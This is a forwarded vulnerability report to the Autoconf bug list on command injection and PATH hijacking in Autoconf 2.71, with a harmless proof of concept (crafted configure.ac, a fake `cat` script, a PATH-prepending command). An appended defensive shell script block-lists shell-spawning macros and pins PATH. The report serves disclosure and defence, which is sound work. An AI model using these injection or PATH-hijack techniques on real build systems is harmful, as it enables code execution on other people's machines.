bug-autoconf


From: Ally Petitt
Subject: Fwd: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Date: Sun, 26 Nov 2023 05:25:08 +0000

Please reply via email because it appears that I am unable to access this
support item through my account on https://savannah.gnu.org/support/?110961.

---------- Forwarded message ---------
From: anonymous <INVALID.NOREPLY@gnu.org>
Date: Sun, Nov 26, 2023 at 5:16 AM
Subject: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
To: <allypetitt@gmail.com>, <bug-autoconf@gnu.org>


URL:
  <https://savannah.gnu.org/support/?110961>

                 Summary: 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
                   Group: Autoconf
               Submitter: None
               Submitted: Sun 26 Nov 2023 05:16:39 AM UTC
                Category: None
                Priority: 5 - Normal
                Severity: 6 - Security
                  Status: None
                 Privacy: Private
             Assigned to: None
        Originator Email: allypetitt@gmail.com
             Open/Closed: Open
         Discussion Lock: Any
        Operating System: GNU/Linux


    _______________________________________________________

Follow-up Comments:


-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC By: Anonymous
= Overview =

Arbitrary code execution can be obtained upon running `/usr/bin/autoconf`
when a crafted `configure.ac` exploits any of the following 3 vulnerabilities:

* Command injection in M4sugar due to lack of input sanitization (CWE-78).
* `cat` command being executed without absolute path in M4sugar, leaving it
  vulnerable to an untrusted PATH (CWE-427).
* Invocation of arbitrary m4 macros in `configure.ac`.


*Date*: 11/25/2023
*Researcher*: Ally Petitt
*Product Tested*: Autoconf v2.71 (it is highly likely this still exists in
more recent releases)
*Impact*: Remote code execution that leads to the loss of availability,
confidentiality, and integrity of the system. In certain cases it can also
lead to privilege escalation.

= Technical Details =

== M4sugar - Multiple Vulnerabilities ==
The `m4_file_append` macro is defined starting on line 3272 of
`lib/m4sugar/m4sugar.m4`.


m4_define([m4_file_append],
[m4_syscmd([cat >>$1 <<_m4eof
$2
_m4eof
])])


This macro has 2 vulnerabilities. Proof-of-Concept examples of each will be
shown in the "PoC" section to provide both clarification and an easy way to
validate the issues.

1. The first vulnerability is that `cat` is called without an absolute path,
leaving it prone to modification of the $PATH environment variable. A
privileged user on the system may set the $PATH to point to a directory they
control containing a malicious executable called `cat`. In scenarios where
`autoconf` has an SUID bit set or can otherwise be run with elevated
privileges, this can lead to privilege escalation.

*Mitigation*: Replace "cat" with "/usr/bin/cat" in the definition of
`m4_file_append`.

2. The arguments passed to `m4_file_append` are not sanitized before being
passed into `m4_syscmd`. This means that hackers can directly insert
malicious code as an argument to the macro and it will be executed when
`autoconf` is run!

*Mitigation*: If possible, implement a more secure way to append to a file
that does not involve running shell commands. I wish I could provide more
guidance here but I am not very proficient in m4. In the case that this is
not feasible, treat `$1` and `$2` as untrusted input and sanitize them.


== Autoconf - Invocation of Arbitrary M4 Macros ==
Autoconf appears to execute m4 macros directly through the `configure.ac`
file. Without any sanitization, adversaries are able to invoke arbitrary
macros including `syscmd` and the aforementioned vulnerable `m4_file_append`.
This can lead to the execution of code upon running `autoconf`. An example
will be shown in the "PoC" section below.

It is worth noting that while executing macros is part of Autoconf's
functionality, I did not find evidence that the arbitrary execution of
commands was an intentional part of this design. As such, the lack of
restriction on the macros that can be called results in a larger attack
surface that can be taken advantage of by hackers.

*Mitigation*: Enforce a whitelist of macros that are able to be executed
from `configure.ac`.


= PoC =

This Proof-of-Concept involves the creation of 4 files within the same
directory. The contents of these files are the following (file names are
commented at the top of each code block):


# configure.ac
AC_INIT([hello], [1.0])
AC_CONFIG_SRCDIR([hello.c])
AC_CONFIG_AUX_DIR([build-aux])
AC_PROG_CC

# Trigger the vulnerabilities by writing to a file called `vulns`
syscmd(echo vuln1 > vulns) # vuln1
m4_file_append(test, `echo vuln2 >> vulns`) # vuln2 and vuln3


AC_CONFIG_FILES([Makefile])
AC_OUTPUT



# Makefile.am
bin_PROGRAMS = hello
hello_SOURCES = hello.c



# hello.c
#include <stdio.h>
int main(int argc, char** argv) {
  printf("hello world!\n");
  return 0;
}



# cat
#!/bin/bash
echo vuln3 >> vulns


The resulting directory listing should be the following:


$ ls
cat  configure.ac  hello.c  Makefile.am


Once the files are verified to be correct, the 3 vulnerabilities can be
exploited by running the command below.

$ export PATH=$(pwd):$PATH && autoconf


A new file will be created called `vulns`. Each vulnerability that was
exploited wrote to this file to create the content below.

vuln1
vuln2
vuln3



Note that exploiting vulnerabilities 1 and 2 (the vulnerabilities that write
"vuln1" and "vuln2" to the `vulns` file, respectively) does not require the
$PATH environment variable to be set and can simply be exploited with the
command below.

$ autoconf --force


These files are also included as a zip archive attached with this bug
report.

    _______________________________________________________
File Attachments:


-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC  Name: poc.zip  Size: 1KiB   By: None

<http://savannah.gnu.org/support/download.php?file_id=55355>

    _______________________________________________________

Reply to this item at:

  <https://savannah.gnu.org/support/?110961>

_______________________________________________
Message sent via Savannah
https://savannah.gnu.org/
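Added example (not from the report above or from Autoconf itself): a POSIX shell audit that flags the shell-spawning macros the report names in a `configure.ac` before `autoconf` is run on it, and a wrapper that runs `autoconf` with PATH pinned to system directories so a directory-local `cat` cannot shadow the real one. The macro list and the constructed sample `configure.ac` are assumptions; `dnl` comments are not stripped, so a hit may need manual review.

```shell
#!/bin/sh
# Macros that reach a shell: m4 builtins plus the m4sugar wrappers named in
# the report. This list is an assumption; extend it for your project.
SHELL_MACROS='syscmd|esyscmd|m4_syscmd|m4_esyscmd|m4_esyscmd_s|m4_file_append'

# A macro name must not be preceded by an identifier character and must be
# followed by its opening parenthesis, so `m4_syscmd(` is one hit, not two.
MACRO_RE="(^|[^A-Za-z0-9_])(${SHELL_MACROS})[[:space:]]*\\("

# Print every offending line (with its line number) of the file in $1.
# Returns 0 when the file is clean, 1 when at least one hit was found.
scan_configure_ac() {
    hits=$(grep -nE "$MACRO_RE" "$1" || true)
    if [ -n "$hits" ]; then
        printf 'shell-spawning macro(s) in %s:\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# Number of lines in $1 that call one of the macros (0 when clean).
count_shell_macros() {
    grep -cE "$MACRO_RE" "$1" || true
}

# Run autoconf only after the scan passes, with PATH pinned to system
# directories so the current directory (or any entry an untrusted
# environment prepended) is never searched for `cat` or `m4`.
safe_autoconf() {
    scan_configure_ac "${1:-configure.ac}" || return 1
    env PATH=/usr/bin:/bin autoconf "$@"
}

# Constructed sample input: two macro calls that reach a shell, one of
# them inside a dnl comment-free line, plus ordinary Autoconf macros.
sample_configure_ac() {
    cat <<'EOF'
AC_INIT([hello], [1.0])
AC_PROG_CC
dnl constructed sample for the audit above
m4_syscmd([echo configured])
m4_file_append([notes.txt], [built])
AC_OUTPUT
EOF
}
```

`safe_autoconf` refuses to run when the scan reports a hit; pass `--force` or an explicit input file and it is forwarded to `autoconf` unchanged.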

